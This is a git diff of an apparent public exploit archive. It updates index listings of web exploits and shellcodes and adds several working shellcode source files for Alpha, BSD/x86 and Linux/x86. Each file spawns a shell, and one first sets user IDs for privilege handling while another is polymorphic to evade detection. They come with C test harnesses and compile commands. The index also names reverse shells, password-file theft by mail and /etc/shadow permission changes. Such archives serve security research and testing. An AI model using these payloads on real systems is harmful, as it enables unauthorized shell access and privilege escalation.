43150,exploits/hardware/webapps/43150.html,"Vonage VDV23 - Cross-Site Scripting",2017-11-16,Nu11By73,webapps,hardware,
19263,exploits/hardware/webapps/19263.txt,"QNAP Turbo NAS 3.6.1 Build 0302T - Multiple Vulnerabilities",2012-06-18,"Sense of Security",webapps,hardware,
19264,exploits/php/webapps/19264.txt,"MyTickets 1.x < 2.0.8 - Blind SQL Injection",2012-06-18,al-swisre,webapps,php,
@@ -37734,6 +37741,14 @@ id,file,description,date,author,type,platform,port
43460,exploits/hardware/webapps/43460.py,"FiberHome LM53Q1 - Multiple Vulnerabilities",2018-01-08,"Ibad Shah",webapps,hardware,
43461,exploits/php/webapps/43461.txt,"WordPress Plugin LearnDash 2.5.3 - Arbitrary File Upload",2018-01-08,NinTechNet,webapps,php,
43462,exploits/php/webapps/43462.html,"Vanilla < 2.1.5 - Cross-Site Request Forgery",2018-01-08,"Anand Meyyappan",webapps,php,
+43475,exploits/php/webapps/43475.txt,"Worpress Plugin Service Finder Booking < 3.2 - Local File Disclosure",2018-01-10,telahdihapus,webapps,php,
+43477,exploits/php/webapps/43477.txt,"Muviko 1.1 - SQL Injection",2018-01-10,"Ahmad Mahfouz",webapps,php,
+43479,exploits/php/webapps/43479.txt,"WordPress Plugin Events Calendar - 'event_id' SQL Injection",2018-01-10,"Dennis Veninga",webapps,php,
+43484,exploits/php/webapps/43484.txt,"WordPress Plugin Social Media Widget by Acurax 3.2.5 - Cross-Site Request Forgery",2018-01-10,"Panagiotis Vagenas",webapps,php,80
+43485,exploits/php/webapps/43485.txt,"WordPress Plugin CMS Tree Page View 1.4 - Cross-Site Request Forgery / Privilege Escalation",2018-01-10,"Panagiotis Vagenas",webapps,php,80
+43486,exploits/php/webapps/43486.txt,"WordPress Plugin Admin Menu Tree Page View 2.6.9 - Cross-Site Request Forgery / Privilege Escalation",2018-01-10,"Panagiotis Vagenas",webapps,php,80
+43487,exploits/php/webapps/43487.txt,"WordPress Plugin WordPress Download Manager 2.9.60 - Cross-Site Request Forgery",2018-01-10,"Panagiotis Vagenas",webapps,php,80
+43488,exploits/php/webapps/43488.txt,"Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting",2018-01-10,"Mattia Furlani",webapps,php,
41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 713fcaa9a..b49df962e 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -4,7 +4,7 @@ id,file,description,date,author,type,platform
13242,shellcodes/bsd/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd
13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve /bin/sh Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc
13244,shellcodes/bsd_x86/13244.c,"BSD/x86 - setuid(0) + execve /bin/sh Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
-13245,shellcodes/bsd_x86/13245.c,"BSD/x86 - Bind TCP Shell (31337/TCP) + setuid(0) Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
+13245,shellcodes/bsd_x86/13245.c,"BSD/x86 - setuid(0) + Bind TCP Shell (31337/TCP) Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
13246,shellcodes/bsd_x86/13246.c,"BSD/x86 - execve /bin/sh Shellcode (27 bytes)",2004-09-26,n0gada,shellcode,bsd_x86
13247,shellcodes/bsd_x86/13247.c,"BSD/x86 - execve /bin/sh + setuid(0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
13248,shellcodes/bsd_x86/13248.c,"BSD/x86 - Bind TCP Shell (31337/TCP) Shellcode (83 bytes)",2004-09-26,no1,shellcode,bsd_x86
@@ -13,8 +13,8 @@ id,file,description,date,author,type,platform
13251,shellcodes/bsd_x86/13251.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (49 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
13252,shellcodes/bsd_x86/13252.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
13254,shellcodes/bsd_x86/13254.c,"BSD/x86 - Reverse TCP Shell (torootteam.host.sk:2222/TCP) Shellcode (93 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
-13255,shellcodes/bsd_x86/13255.c,"BSD/x86 - execve /bin/cat /etc/master.passwd | mail [email] Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
-13256,shellcodes/bsd_x86/13256.c,"BSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,bsd_x86
+13255,shellcodes/bsd_x86/13255.c,"BSD/x86 - execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
+13256,shellcodes/freebsd_x86/13256.c,"FreeBSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,freebsd_x86
13257,shellcodes/bsdi_x86/13257.txt,"BSDi/x86 - execve /bin/sh Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86
13258,shellcodes/bsdi_x86/13258.txt,"BSDi/x86 - execve /bin/sh Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86
13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve /bin/sh ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86
@@ -416,7 +416,7 @@ id,file,description,date,author,type,platform
15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)",2010-12-09,"Jonathan Salwan",shellcode,generator
15879,shellcodes/win_x86/15879.txt,"Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode",2010-12-31,Skylined,shellcode,win_x86
16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:1337/TCP) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator
-16026,shellcodes/bsd_x86/16026.c,"BSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,bsd_x86
+16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86
16283,shellcodes/win_x86/16283.txt,"Windows x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,win_x86
17432,shellcodes/sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,sh4
17194,shellcodes/lin_x86/17194.txt,"Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,lin_x86
@@ -622,6 +622,12 @@ id,file,description,date,author,type,platform
41510,shellcodes/lin_x86-64/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,lin_x86-64
41581,shellcodes/win_x86/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",shellcode,win_x86
43433,shellcodes/lin_x86/43433.c,"Linux/x86 - Reverse TCP /bin/sh Shell (127.1.1.1:8888/TCP) Null-Free Shellcode (67/69 bytes)",2018-01-05,"Nipun Jaswal",shellcode,lin_x86
+43476,shellcodes/lin_x86/43476.c,"Linux/x86 - execve /bin/dash Shellcode (30 bytes)",2018-01-10,"Hashim Jawad",shellcode,lin_x86
+43480,shellcodes/alpha/43480.c,"Alpha - /bin/sh Shellcode (80 bytes)",2009-01-01,"Lamont Granquist",shellcode,alpha
+43481,shellcodes/alpha/43481.c,"Alpha - execve() Shellcode (112 bytes)",2009-01-01,anonymous,shellcode,alpha
+43482,shellcodes/alpha/43482.c,"Alpha - setuid() Shellcode (156 bytes)",2009-01-01,anonymous,shellcode,alpha
+43483,shellcodes/bsd_x86/43483.c,"BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes)",2009-01-01,"Jihyeog Lim",shellcode,bsd_x86
+43489,shellcodes/lin_x86/43489.c,"Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)",2018-01-10,"Debashis Pal",shellcode,lin_x86
41630,shellcodes/lin_x86/41630.asm,"Linux/x86 - exceve /bin/sh Encoded Shellcode (44 Bytes)",2017-03-17,WangYihang,shellcode,lin_x86
41631,shellcodes/lin_x86/41631.c,"Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,lin_x86
41635,shellcodes/lin_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 Bytes)",2017-03-19,WangYihang,shellcode,lin_x86
diff --git a/shellcodes/alpha/43480.c b/shellcodes/alpha/43480.c
new file mode 100644
index 000000000..c63fe32a5
--- /dev/null
+++ b/shellcodes/alpha/43480.c
@@ -0,0 +1,29 @@
+/*
+ Lamont Granquist
+ lamontg@hitl.washington.edu
+ lamontg@u.washington.edu
+*/
+
+int rawcode[] = {
+ 0x2230fec4, /* subq $16,0x13c,$17 [2000]*/
+ 0x47ff0412, /* clr $18 [2000]*/
+ 0x42509532, /* subq $18, 0x84 [2000]*/
+ 0x239fffff, /* xor $18, 0xffffffff, $18 */
+ 0x4b84169c,
+ 0x465c0812,
+ 0xb2510134, /* stl $18, 0x134($17)[2000]*/
+ 0x265cff98, /* lda $18, 0xff978cd0[2000]*/
+ 0x22528cd1,
+ 0x465c0812, /* xor $18, 0xffffffff, $18 */
+ 0xb2510140, /* stl $18, 0x140($17)[2000]*/
+ 0xb6110148, /* stq $16,0x148($17) [2000]*/
+ 0xb7f10150, /* stq $31,0x150($17) [2000]*/
+ 0x22310148, /* addq $17,0x148,$17 [2000]*/
+ 0x225f013a, /* ldil $18,0x13a [2000]*/
+ 0x425ff520, /* subq $18,0xff,$0 [2000]*/
+ 0x47ff0412, /* clr $18 [2000]*/
+ 0xffffffff, /* call_pal 0x83 [2000]*/
+ 0xd21fffed, /* bsr $16,$l1 ENTRY */
+ 0x6e69622f, /* .ascii "/bin" [2000]*/
+ /* .ascii "/sh\0" is generated */
+};
\ No newline at end of file
diff --git a/shellcodes/alpha/43481.c b/shellcodes/alpha/43481.c
new file mode 100644
index 000000000..5d6078227
--- /dev/null
+++ b/shellcodes/alpha/43481.c
@@ -0,0 +1,55 @@
+char shellcode[]=
+ "\x30\x15\xd9\x43" /* subq $30,200,$16 */
+ /* $16 = $30 - 200
+ /* $16 must have the shellcode address. However, before */
+ /* the bsr instruction, $16 can't have the address. */
+ /* This instruction just store the meaningless address. */
+ /* The all instruction before bsr are meaningless. */
+
+ "\x11\x74\xf0\x47" /* bis $31,0x83,$17 */
+ /* $17 = 0 or 0x83 */
+ /* $17 = 0x83 */
+ "\x12\x94\x07\x42" /* addq $16,60,$18 */
+ "\xfc\xff\x32\xb2" /* stl $17,-4($18) */
+ /* $17("\x83\x00\x00\x00") is stored in $16 + 60 - 4 */
+ /* address. */
+ /* ( "\xff\xff\xff\xff" -> "\x83\x00\x00\x00" ) */
+
+ "\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
+ "\x1f\x04\x31\x22" /* lda $17,0x041f($17) */
+ /* $17 = "\x1f\x04\xff\x47" */
+ /* "\x1f\x04\xff\x47" is nop instruction. */
+
+ "\xfc\xff\x30\xb2" /* stl $17,-4($16) */
+ /* change "bsr $16,-28" instruction" into nop */
+ /* instruction to pass through the bsr instruction. */
+ /* ( "\xf9\xff\x1f\xd2" -> "\x1f\x04\xff\x47" ) */
+
+ "\xf9\xff\x1f\xd2" /* bsr $16,-28 */
+ /* Jump to "bis $31,0x83,$17" and store the current */
+ /* address in the $16. */
+ /* After jump, this insturction will be changed into */
+ /* nop instruction. */
+
+ "\x30\x15\xd9\x43" /* subq $30,200,$16 */
+ "\x31\x15\xd8\x43" /* subq $30,192,$17 */
+ "\x12\x04\xff\x47" /* clr $18 */
+ "\x40\xff\x1e\xb6" /* stq $16,-192($30) */
+ "\x48\xff\xfe\xb7" /* stq $31,-184($30) */
+ "\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
+ "\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
+ "\x12\x04\xff\x47" /* clr $18 */
+ "\x40\xff\x1e\xb6" /* stq $16,-192($30) */
+ "\x48\xff\xfe\xb7" /* stq $31,-184($30) */
+ "\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
+ "\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
+ "\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
+ "\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
+ "\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
+ "\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
+ "\x38\xff\x7e\xb2" /* stl $19,-200($30) */
+ "\x13\x94\xe7\x43" /* addq $31,60,$19 */
+ "\x20\x35\x60\x42" /* subq $19,1,$0 */
+
+ "\xff\xff\xff\xff"; /* callsys ( disguised ) */
+ /* This will be changed to "\x83\x00\x00\x00" */
\ No newline at end of file
diff --git a/shellcodes/alpha/43482.c b/shellcodes/alpha/43482.c
new file mode 100644
index 000000000..129c4a5f9
--- /dev/null
+++ b/shellcodes/alpha/43482.c
@@ -0,0 +1,40 @@
+char shellcode[]=
+ "\x30\x15\xd9\x43" /* subq $30,200,$16 */
+ "\x11\x74\xf0\x47" /* bis $31,0x83,$17 */
+ "\x12\x14\x02\x42" /* addq $16,16,$18 */
+ "\xfc\xff\x32\xb2" /* stl $17,-4($18) */
+ "\x12\x94\x09\x42" /* addq $16,76,$18 */
+ "\xfc\xff\x32\xb2" /* stl $17,-4($18) */
+ "\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
+ "\x12\x14\x02\x42" /* addq $16,16,$18 */
+ "\xfc\xff\x32\xb2" /* stl $17,-4($18) */
+ "\x12\x94\x09\x42" /* addq $16,76,$18 */
+ "\xfc\xff\x32\xb2" /* stl $17,-4($18) */
+ "\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
+ "\x1f\x04\x31\x22" /* lda $17,0x041f($17) */
+ "\xfc\xff\x30\xb2" /* stl $17,-4($16) */
+ "\xf7\xff\x1f\xd2" /* bsr $16,-32 */
+ "\x10\x04\xff\x47" /* clr $16 */
+ "\x11\x14\xe3\x43" /* addq $31,24,$17 */
+ "\x20\x35\x20\x42" /* subq $17,1,$0 */
+ "\xff\xff\xff\xff" /* callsys ( disguised ) */
+ "\x30\x15\xd9\x43" /* subq $30,200,$16 */
+ "\x31\x15\xd8\x43" /* subq $30,192,$17 */
+ "\x12\x04\xff\x47" /* clr $18 */
+ "\x40\xff\x1e\xb6" /* stq $16,-192($30) */
+ "\x48\xff\xfe\xb7" /* stq $31,-184($30) */
+ "\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
+ "\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
+ "\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
+ "\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
+ "\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
+ "\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
+ "\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
+ "\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
+ "\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
+ "\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
+ "\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
+ "\x38\xff\x7e\xb2" /* stl $19,-200($30) */
+ "\x13\x94\xe7\x43" /* addq $31,60,$19 */
+ "\x20\x35\x60\x42" /* subq $19,1,$0 */
+ "\xff\xff\xff\xff"; /* callsys ( disguised ) */
\ No newline at end of file
diff --git a/shellcodes/bsd_x86/43483.c b/shellcodes/bsd_x86/43483.c
new file mode 100644
index 000000000..90354b252
--- /dev/null
+++ b/shellcodes/bsd_x86/43483.c
@@ -0,0 +1,25 @@
+/*
+ * bsd/x86 setreuid/exec shellcode
+ *
+ * setreuid(geteuid(), geteuid()) and execve("/bin/sh", "/bin/sh", 0)
+ * shellcode based on hkpco's setreuid/exec shellcode for linux
+ * Tested on FreeBSD
+*/
+
+#include
+#include
+
+char shellcode[] =
+ "\x31\xc0\xb0\x19\x50\xcd\x80\x50"
+ "\x50\x31\xc0\xb0\x7e\x50\xcd\x80" // setreuid(geteuid(), getuid());
+ "\xeb\x0d\x5f\x31\xc0\x50\x89\xe2"
+ "\x52\x57\x54\xb0\x3b\xcd\x80\xe8"
+ "\xee\xff\xff\xff/bin/sh"; // exec(/bin/sh)
+
+int main()
+{
+int (*f)() = (int (*)())shellcode;
+ printf("%d\n",strlen(shellcode));
+f();
+ return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/bsd_x86/13256.c b/shellcodes/freebsd_x86/13256.c
similarity index 100%
rename from shellcodes/bsd_x86/13256.c
rename to shellcodes/freebsd_x86/13256.c
diff --git a/shellcodes/bsd_x86/16026.c b/shellcodes/freebsd_x86/16026.c
similarity index 100%
rename from shellcodes/bsd_x86/16026.c
rename to shellcodes/freebsd_x86/16026.c
diff --git a/shellcodes/lin_x86/43476.c b/shellcodes/lin_x86/43476.c
new file mode 100644
index 000000000..de6c97ed9
--- /dev/null
+++ b/shellcodes/lin_x86/43476.c
@@ -0,0 +1,76 @@
+/*
+
+################## Description ####################
+
+; Title : exec /bin/dash - Shellcode
+; Author : Hashim Jawad
+; Website : ihack4falafel[.]com
+; Twitter : @ihack4falafel
+; SLAE ID : SLAE-1115
+; Purpose : spawn /bin/dash shell
+; OS : Linux
+; Arch : x86
+; Size : 30 bytes
+
+################### dash.nasm #####################
+
+global _start
+
+section .text
+
+_start:
+
+ ; push NULL into the stack
+ xor eax, eax
+ push eax
+
+ ; push (////bin/dash) into the stack
+
+ push 0x68736164
+ push 0x2f6e6962
+ push 0x2f2f2f2f
+
+ ; push ESP pointer to EBX
+ mov ebx, esp
+
+ ; execute __NR_execve syscall
+ push eax
+ mov edx, esp
+ push ebx
+ mov ecx, esp
+ mov al, 0xb
+ int 0x80
+
+################### dash binary #####################
+
+nasm -f elf32 -o dash.o dash.nasm
+
+ld -z execstack -o dash dash.o
+
+################### Shellcode ########################
+
+objdump -d dash -M intel
+
+################## Compile #########################
+
+gcc -fno-stack-protector -z execstack dash.c -o dash
+
+*/
+
+#include
+#include
+
+unsigned char code[] = \
+"\x31\xc0\x50\x68\x64\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
+
+
+main()
+{
+
+ printf("Shellcode Length: %d\n", strlen(code));
+
+ int (*ret)() = (int(*)())code;
+
+ ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/lin_x86/43489.c b/shellcodes/lin_x86/43489.c
new file mode 100644
index 000000000..b5d0c117f
--- /dev/null
+++ b/shellcodes/lin_x86/43489.c
@@ -0,0 +1,66 @@
+/*
+# Title: Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)
+# Date: 10-Jan-2018
+# Exploit Author: Debashis Pal
+# SLAE-1122
+# Tested on: i686 GNU/Linux
+# '//bin/sh' = 0x68732f6e 0x69622f2f
+
+
+########## polymorphic.nasm ##########
+
+global _start
+section .text
+_start:
+add esi, 0x30 ;junk
+xor ecx, ecx
+mul ecx
+mov dword [esp-4], ecx
+sub esp, 4
+mov esi, 0x353ffc3b
+add esi, 0x33333333 ; 0x68732f6e
+mov dword [esp-4], esi
+mov edi, 0xada67373
+sub edi, 0x44444444 ; 0x69622f2f
+mov dword [esp-8], edi
+sub esp, 8
+mov ebx, esp
+mov al, 11
+int 0x80
+
+####################################
+
+$ nasm -f elf polymorphic.nasm
+$ ld -o polymorphic polymorphic.o
+$ objdump -d ./polymorphic|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
+"\x83\xc6\x30\x31\xc9\xf7\xe1\x89\x4c\x24\xfc\x83\xec\x04\xbe\x3b\xfc\x3f\x35\x81\xc6\x33\x33\x33\x33\x89\x74\x24\xfc\xbf\x73\x73\xa6\xad\x81\xef\x44\x44\x44\x44\x89\x7c\x24\xf8\x83\xec\x08\x89\xe3\xb0\x0b\xcd\x80"
+$ gcc -fno-stack-protector -z execstack shellcode.c -o x86PolymorphicShellcodelinux32
+$ ./x86PolymorphicShellcodelinux32
+Shellcode Length: 53
+$ uname -a
+Linux kali 4.4.0-kali1-686 #1 SMP Debian 4.4.2-3kali1 (2016-02-23) i686 GNU/Linux
+$
+
+####################################
+
+*/
+
+
+#include
+#include
+
+unsigned char code[] = \
+"\x83\xc6\x30\x31\xc9\xf7\xe1\x89\x4c\x24\xfc\x83\xec\x04\xbe\x3b\xfc\x3f\x35"
+"\x81\xc6\x33\x33\x33\x33\x89\x74\x24\xfc\xbf\x73\x73\xa6\xad\x81\xef\x44\x44"
+"\x44\x44\x89\x7c\x24\xf8\x83\xec\x08\x89\xe3\xb0\x0b\xcd\x80";
+
+int main()
+{
+
+ printf("Shellcode Length: %d\n", strlen(code));
+
+ int (*ret)() = (int(*)())code;
+
+ ret();
+
+}
\ No newline at end of file